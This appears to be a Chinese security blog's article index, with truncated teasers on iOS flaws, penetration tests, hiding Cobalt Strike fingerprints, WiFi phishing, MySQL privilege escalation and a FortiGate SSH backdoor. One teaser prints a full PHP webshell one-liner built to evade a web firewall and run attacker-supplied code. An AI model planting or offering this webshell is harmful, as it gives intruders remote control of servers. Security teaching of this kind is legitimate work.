环境:用手机开启的热点,pc本一台,ipad一台pc电脑:192.168.43.30ipad:192.168.43.145影响版本Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分...
一波三折の渗透!细心即无敌
本文作者:圈子社区-Y4er首发于圈子社区,未经允许,禁止转载https://www.secquan.org/Discuss/1069054 常规操作偶然的情况下得到了这个站,于是就测试了一...
去除Cobalt Strike 3.12“空格”特征版本
前言关于Cobalt Strike “空格”特征详细说明,请看:https://mp.weixin.qq.com/s/qgfP2hCpes7HNbB5Z18u5w去除过程关于失败的过程一句话描述下:j...
「Time to Live 」杂谈
写在前面 好久没更新,大家莫怪,这就奉上我们团队小伙伴Medici.Yan的最新文章,文章只是一家之言,有什么不全面的还望大家拍砖交流。 正文来了先来看张图:ping 命令想必接触到计算机的人多少都用...
过狗菜刀专用一句话简解及用法(不要再醉了)
论坛有个哥们儿服务器上查出来个“特殊的”一句话,代码如下:1<?$Exp=strrev($_POST['x']);eval($Exp($_POST[z0]);原帖:https:/...
日本拟高薪从民间招募网络高手对抗黑客攻击
据外媒14日报道,日本政府宣布,为了应对日渐增加的网络攻击,特别是为2020年的东京夏季奥运做准备,日本政府决定提供优厚的待遇,从民间招募所谓的“反黑客组织”,他们将具备极高度的信息系统防护专业知识,...
紧急:飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7!!
通过过Zoomeye搜索发现存在 64567台主机,挑选一台进行测试测试代码:#!/usr/bin/env python# SSH Backdoor for FortiGate OS Version ...
【奇技淫巧】用wvs进行表单破解
基于wvs下的表单破解.---- http fuzz的使用入门文章,大牛绕过。简单得步骤,凑个字就变成文章了。看很多人都用burpsuit。但是需要装java环境啊有木有。很蛋疼的其实,有木有!wvs...
【奇技淫巧】PHP file_put_content函数写文件鸡肋绕过
昨天遇到个站,非常奇葩,把客户的评论写到文件里面,而且开了报错。所以就很容易地看出了那个文件的源码,大概是这样的: &...
突破不支持php脚本进行mysql提权
0x1 提权前信息收集1.菜刀是否可以执行cmd:2.支持哪些脚本?探测结果支持:aspx,不支持php(php直接原样输出代码!) —>aspx可以执行cmd3.aspx...
记一次Android So错误定位
0x01 远程调试USB外接摄像头因为要占用type c接口,所以必须要远程调试。这里使用mate20远程调试,需要注意一点,要在设备中开启`"仅充电"模式下允许ADB调试`。插上数据线,之后在同一W...
【技术篇】利用渗透工具kali linux进行wifi钓鱼
Wifi钓鱼是一种十分常见的网络安全风险, 黑客常利用虚假的免费wifi窃取用户数据。今天技术篇主要介绍如何利用渗透工具kali linux 进行wifi钓鱼,教程由我们的技术大牛赛博南Kenny出...
25488